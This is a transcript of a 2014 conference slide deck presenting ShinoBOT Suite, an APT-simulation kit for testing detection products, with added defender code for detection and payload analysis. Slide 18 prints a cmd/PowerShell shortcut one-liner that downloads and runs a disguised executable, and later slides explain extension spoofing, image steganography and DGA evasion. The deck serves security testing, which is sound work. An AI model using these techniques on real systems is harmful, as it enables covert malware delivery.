ShinoBOT Suite
DESCRIPTION
ShinoBOT Suite is a cyber attack campaign simulator. This slide deck was presented at the Black Hat USA 2014 Arsenal.
TRANSCRIPT
![Page 1: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/1.jpg)
ShinoBOT Suite: can you prevent APT like me?
ShinoBOT Suite. All bad stuff included: RAT, C&C Server, Downloader, Dropper, Decoy File, Exploit, Stegano, Crypto, DGA and more…
@Sh1n0g1
APT Making Kit!
DO NOT USE THIS ILLEGALLY
ShinoBOT SUITE
The APT Simulator Tool Kit
@Sh1n0g1
![Page 2: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/2.jpg)
About Me
Shota Shinogi, @Sh1n0g1, http://shinosec.com
Security Researcher at Macnica Networks Corp., a Japanese distributor of security/network products
Enthusiast of writing (ethical) malware
Presented ShinoBOT (not Suite) last year at Arsenal
![Page 3: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/3.jpg)
ShinoBOT the RAT
ShinoBOT.exe
ShinoBOT is a RAT (simulator), presented at Black Hat USA 2013 Arsenal. It connects to ShinoC2, the C&C server, using HTTP(S).
What you can do with ShinoBOT via ShinoC2:
Execute a command
Upload / download a file
Take a screenshot
It is a SIMULATOR: it has a GUI, and you need the password, which is shown on the GUI, to control it.
![Page 4: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/4.jpg)
What is ShinoBOT Suite
ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly sophisticated attack campaign.
What is contained:
Exploit (a shortcut that contains a malicious script)
Malware Delivery Server (ShinoMAL.mooo.com)
Downloader/Dropper (ShinoDownloader.exe)
RAT (ShinoBOT.exe)
C&C Server (ShinoC2)
Steganography, crypto, DGA and some evasion techniques
![Page 5: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/5.jpg)
Why ShinoBOT Suite?
There is a bunch of new security tools to detect and respond to unknown threats:
Sandbox-based Malware Detection System
ETDR (Endpoint Threat Detection & Response)
SIEM (Security Information & Event Manager)
Security Analytics / Network Forensics
It is hard to evaluate those new products: known malware will be detected by signature, and known malware ≠ unknown threat.
To simulate a realistic APT:
requires a high skill
takes too much time
spends a lot of money using some commercial tools
![Page 6: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/6.jpg)
ShinoBOT Suite Campaign
[Diagram: campaign flow between the Malicious Shortcut, Downloader, Dropper, RAT, Decoy File, C&C Server and Malware Deploy Server; files shown: dldr_tmp, img.jpg, ShinoBOT.exe]
1) Download  2) Execute  3) Drop  4) Open  5) Download  6) Decrypt  7) Execute  8) C2 Communication
![Page 7: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/7.jpg)
ShinoBOT Suite Campaign
[Same diagram with the component names added: ShinoMAL is the Malware Deploy Server, ShinoC2 the C&C Server, ShinoBOT the RAT, ShinoDownloader the Downloader]
1) Download  2) Execute  3) Drop  4) Open  5) Download  6) Decrypt  7) Execute  8) C2 Communication
![Page 8: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/8.jpg)
DEMONSTRATION STEP1
![Page 9: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/9.jpg)
DEMONSTRATION STEP2
![Page 10: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/10.jpg)
DEMONSTRATION STEP3
![Page 11: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/11.jpg)
DEMONSTRATION STEP4
![Page 12: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/12.jpg)
DEMONSTRATION STEP3
![Page 13: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/13.jpg)
DEMONSTRATION RUN
Decoy File
ShinoBOT works in background
![Page 14: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/14.jpg)
DEMONSTRATION CONTROL1
To control ShinoBOT (RAT), you need to grab the password; it is there to prevent the abuse of ShinoBOT.
ShinoBOT saved its password to the same folder (C:\Users\%USERNAME%\sb.pas).
You can access the password file remotely:
\\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas
![Page 15: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/15.jpg)
DEMONSTRATION CONTROL2
To control ShinoBOT (RAT), you need to grab the password; it is there to prevent the abuse of ShinoBOT.
ShinoBOT saved its password in this text file (C:\Users\%USERNAME%\sb.pas).
You can access the password file remotely:
\\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas
This password protection is to prevent the real bad guys from abusing ShinoBOT.
![Page 16: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/16.jpg)
DEMONSTRATION CONTROL3
Access ShinoBOT.com
Go to the host list
Your host will appear in the host list
Click the [View/Assign Jobs] link
![Page 17: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/17.jpg)
DEMONSTRATION CONTROL4
Enter the password to see the Loot (result) of the command
Enter the password to assign a new job
![Page 18: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/18.jpg)
Technical Detail 1
Malicious Shortcut: the "target" of the shortcut (all in one line)
cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('DOWNLOADERURL', '%TEMP%\LicenseRnd.txt'); & %TEMP%\LicenseRnd.txt&::DECOYFILENAME
POWERSHELL downloads the downloader and saves it (Rnd means a random string)
CMD executes the downloader
CMD ignores the last part, because :: means a comment
![Page 19: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/19.jpg)
Technical Detail 2
Extension Spoofing: on the target of the shortcut there is the line "%TEMP%\LicenseRnd.txt" (previous slide).
Usually, when you double-click a file with .txt, Notepad will launch.
CMD.exe can execute executables (files containing the MZ header) with any extension.
ShinoBOT Suite uses this technique to spoof the extension and make the downloader hard to find on the disk.
Actually, it is ShinoDownloader.exe.
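Added example for slides 18 and 19 (not ShinoBOT Suite code): a defender-side check that flags the indicators in the shortcut target shown above and finds files under a non-executable extension that actually start with the MZ header. It assumes the shortcut target or process command line is available as a string (from the .lnk or from process-creation logging); the regex names, sample file names and the scratch folder are constructed here.

```python
import re
import tempfile
from pathlib import Path

# One regex per indicator visible in the slide's shortcut target.
INDICATORS = {
    "cmd_spawns_powershell": re.compile(r"\bcmd(\.exe)?\s+/c\s+powershell\b", re.I),
    "webclient_downloadfile": re.compile(r"System\.Net\.WebClient.*?\.DownloadFile\(", re.I | re.S),
    "runs_file_with_nonexec_ext": re.compile(r"&\s*%TEMP%\\[^\s&]+\.(txt|jpg|pdf|dat)\b", re.I),
    "decoy_name_hidden_in_comment": re.compile(r"&\s*::\s*\S+"),
}
EXECUTABLE_EXTS = {".exe", ".dll", ".com", ".scr", ".sys", ".cpl"}


def score_shortcut_target(target: str) -> list[str]:
    """Return the indicators present in a shortcut target / command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(target)]


def is_renamed_executable(path: Path) -> bool:
    """True for a file whose extension says 'not a program' but whose first
    two bytes are the MZ header; cmd.exe runs it regardless of extension."""
    if path.suffix.lower() in EXECUTABLE_EXTS:
        return False
    with path.open("rb") as fh:
        return fh.read(2) == b"MZ"


def scan_dir(folder: Path) -> list[str]:
    """Names of renamed executables in `folder` (e.g. the user's %TEMP%)."""
    return sorted(p.name for p in folder.iterdir() if p.is_file() and is_renamed_executable(p))


# Constructed sample: the slide's target with its placeholders kept verbatim.
SAMPLE_TARGET = (
    "cmd.exe /c powershell (new-object System.Net.WebClient)"
    ".DownloadFile('DOWNLOADERURL', '%TEMP%\\LicenseRnd.txt');"
    " & %TEMP%\\LicenseRnd.txt&::DECOYFILENAME"
)
BENIGN_TARGET = "C:\\Windows\\notepad.exe C:\\Users\\me\\notes.txt"


def demo_scan() -> list[str]:
    """Drop two constructed files in a scratch folder: PE bytes under a .txt
    name (what the campaign leaves behind) and a real text file."""
    folder = Path(tempfile.mkdtemp())
    (folder / "LicenseX7q2.txt").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)
    (folder / "readme.txt").write_bytes(b"just notes")
    return scan_dir(folder)
```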
![Page 20: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/20.jpg)
Technical Detail 3
Crypto Stuff: ShinoBOT Suite uses XOR and ROR (4-bit rotate).
The key is used just for the XOR, and ROR is always 4 bits.
ShinoBOT Suite generates a random key (200 ~ 255 bytes), so it is a little bit difficult to decrypt the whole file without having the key.
![Page 21: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/21.jpg)
Technical Detail 4
Steganography: the encrypted RAT is hidden in the kitten image (JPG data).
[Binary Visualizer: JPG data followed by the Encrypted RAT]
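Added example for slides 20 and 21 (not ShinoBOT Suite code): an analyst's view of steps 5 and 6 of the campaign, carving the payload out of the image and removing the XOR + ROR-4 layer. Assumptions: the encrypted RAT sits after the JPEG end-of-image marker, each byte was rotated right by 4 bits and then XORed with the repeating key (the slide does not give the order), and the 64-byte DOS header is used as known plaintext; the sample image, RAT and key are constructed.

```python
import os

JPEG_EOI = b"\xff\xd9"
# The 64-byte DOS header most Windows linkers emit: known plaintext for an analyst (constructed).
KNOWN_PE_PREFIX = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
                   b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 32 + b"\x80\x00\x00\x00")


def ror4(b: int) -> int:
    """Rotate an 8-bit value right by 4 (a nibble swap; it is its own inverse)."""
    return ((b >> 4) | (b << 4)) & 0xFF


def obfuscate(data: bytes, key: bytes) -> bytes:
    """ROR-4 each byte, then XOR with the repeating key (assumed order)."""
    return bytes(ror4(b) ^ key[i % len(key)] for i, b in enumerate(data))


def deobfuscate(data: bytes, key: bytes) -> bytes:
    """Inverse of obfuscate: undo the XOR, then swap the nibbles back."""
    return bytes(ror4(b ^ key[i % len(key)]) for i, b in enumerate(data))


def carve_after_eoi(image: bytes) -> bytes:
    """Bytes after the first FF D9 marker, which an image viewer ignores.  Caveat: an
    EXIF thumbnail has its own FF D9, so a production parser should walk the segments."""
    idx = image.find(JPEG_EOI)
    if idx < 0:
        raise ValueError("no FF D9 marker: not a complete JPEG")
    return image[idx + len(JPEG_EOI):]


def recover_key_prefix(cipher: bytes, known: bytes) -> bytes:
    """Known-plaintext attack on the XOR layer: key[i] = cipher[i] ^ ror4(known[i]).  Only
    len(known) key bytes fall out, so a 200..255-byte key is mostly untouched by the header."""
    return bytes(c ^ ror4(p) for c, p in zip(cipher, known))


# Constructed sample: a fake RAT appended to a minimal JPEG skeleton, key length as on the slide.
SAMPLE_RAT = KNOWN_PE_PREFIX + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 400
SAMPLE_KEY = os.urandom(200 + os.urandom(1)[0] % 56)  # 200..255 random bytes
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0" + b"\x00" * 32 + JPEG_EOI + obfuscate(SAMPLE_RAT, SAMPLE_KEY)


def analyse(image: bytes, key: bytes) -> dict:
    """Carve, recover what the header reveals of the key, then decode with the real key."""
    payload = carve_after_eoi(image)
    partial = recover_key_prefix(payload, KNOWN_PE_PREFIX)
    return {
        "trailing_bytes": len(payload),
        "key_bytes_recovered": len(partial),
        "recovered_part_correct": partial == key[: len(partial)],
        "decoded_is_pe": deobfuscate(payload, key)[:2] == b"MZ",
    }
```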
![Page 22: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/22.jpg)
Technical Detail 5
Domain Generation Algorithm: ShinoBOT (the RAT) uses a pseudo-DGA.
It generates a random host name for the C2 server: rrrr.r.shinobot.com, where "r" is replaced by a random character.
The DNS of shinobot.com responds to any host with the C2 server IP address.
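Added example for slide 22 (not ShinoBOT Suite code): detection logic run over resolver log lines. Because the zone answers every name with the one C2 address, the DGA shows up as many distinct hostnames under a single parent domain that all resolve to the same IP; the log format "<time> <client> <qname> <answer_ip>", the sample lines and the addresses are constructed.

```python
import re
from collections import defaultdict

# Exact shape from the slide: four random characters, a dot, one more, then the parent.
SHINOBOT_DGA = re.compile(r"^[a-z0-9]{4}\.[a-z0-9]\.shinobot\.com$", re.I)


def parent_domain(qname: str, levels: int = 2) -> str:
    """Last `levels` labels: 'k3zq.a.shinobot.com' -> 'shinobot.com'."""
    return ".".join(qname.rstrip(".").lower().split(".")[-levels:])


def find_wildcard_dga(lines, min_hosts: int = 5) -> dict:
    """Group queries by parent domain and report domains where many distinct
    hostnames all received one and the same answer: wildcard DNS fronting a C2."""
    hosts, answers = defaultdict(set), defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) < 4:  # assumed format: "<time> <client> <qname> <answer_ip>"
            continue
        _time, _client, qname, ip = parts[:4]
        dom = parent_domain(qname)
        hosts[dom].add(qname.lower())
        answers[dom].add(ip)
    return {
        dom: {
            "distinct_hosts": len(h),
            "answer": next(iter(answers[dom])),
            "matches_slide_pattern": all(SHINOBOT_DGA.match(x) for x in h),
        }
        for dom, h in hosts.items()
        if len(h) >= min_hosts and len(answers[dom]) == 1
    }


# Constructed resolver log; client and answer addresses come from documentation ranges.
SAMPLE_LOG = [
    "10:00:01 192.168.1.20 k3zq.a.shinobot.com 203.0.113.10",
    "10:00:02 192.168.1.20 p0x7.m.shinobot.com 203.0.113.10",
    "10:00:03 192.168.1.20 9qwe.z.shinobot.com 203.0.113.10",
    "10:00:04 192.168.1.20 r2d2.c.shinobot.com 203.0.113.10",
    "10:00:05 192.168.1.20 hh4j.t.shinobot.com 203.0.113.10",
    "10:00:06 192.168.1.21 www.example.com 192.0.2.10",
    "10:00:07 192.168.1.21 mail.example.com 192.0.2.11",
    "10:00:08 192.168.1.21 cdn.example.com 192.0.2.12",
    "10:00:09 192.168.1.21 docs.example.com 192.0.2.13",
    "10:00:10 192.168.1.21 blog.example.com 192.0.2.14",
]
```

Services hosted behind a legitimate wildcard record trip the same rule, so pair it with an allow-list or a label-entropy score before alerting.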
![Page 23: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/23.jpg)
All Components are customizable, modular
[Diagram: the same eight-step campaign flow (1) Download, 2) Execute, 3) Drop, 4) Open, 5) Download, 6) Decrypt, 7) Execute, 8) C2 Communication) with substituted components: the Exploit becomes ShellCode delivered by a Phishing Email, the Downloader/Dropper is KB1234567.exe, the Decoy File is Invitation.pdf (a legitimate Invitation.pdf is shown to the user), and the RAT is still ShinoBOT.exe carried in img.jpg from the Malware Deploy Server to the C&C Server]
![Page 24: ShinoBOT Suite](https://reader036.vdocuments.us/reader036/viewer/2022062514/557c1506d8b42ae7748b52c5/html5/thumbnails/24.jpg)
Thank you
Visit my site and get the recipe of ShinoBOT SUITE.
@Sh1n0g1
Do not use it illegally
http://shinosec.com